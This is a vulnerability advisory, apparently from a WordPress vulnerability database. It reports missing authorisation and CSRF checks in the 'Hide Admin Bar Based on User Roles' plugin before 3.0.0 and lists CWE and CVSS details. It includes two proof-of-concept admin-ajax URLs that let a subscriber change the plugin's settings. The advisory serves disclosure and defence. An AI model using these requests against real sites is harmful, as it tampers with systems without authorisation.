Hide Admin Bar Based on User Roles < 3.0.0 – Subscriber+ Settings Update

Description

The plugin does not have authorisation and CSRF checks, allowing any authenticated users, such as subscriber, to update the plugin's settings

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=save_user_roles&caps=test&disableForAll=no
https://example.com/wp-admin/admin-ajax.php?action=save_user_roles&disableForAll=yes

Affects Plugins

hide-admin-bar-based-on-user-roles

Fixed in 3.0.0

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

CVSS

4.3 (medium)

Miscellaneous

Original Researcher

Jan w Oleju

Submitter

Jan w Oleju

Verified

Yes

WPVDB ID

e0ce2213-ab54-4168-9378-36724b3936db

Timeline

Publicly Published

2022-02-21 (about 3 years ago)

Added

2022-02-21 (about 3 years ago)

Last Updated

2022-02-21 (about 3 years ago)

Other

Published

Title

Published

2024-02-14

Title

InstaWP Connect < 0.1.0.9 - Authenticated (Subscriber+) Remote Code Execution

Published

2023-02-02

Title

Magazine Edge <= 1.13 - Subscriber+ Arbitrary Plugin Activation

Published

2025-05-01

Title

OTP-less one tap Sign in 2.0.14 - 2.0.59 - Unauthenticated Arbitrary Email Update to Account Takeover/Privilege Escalation

Published

2025-07-04

Title

LMSACE Connect <= 3.4 - Missing Authorization

Published

2025-10-28

Title

Elastic Email Sender < 1.2.21 - Missing Authorization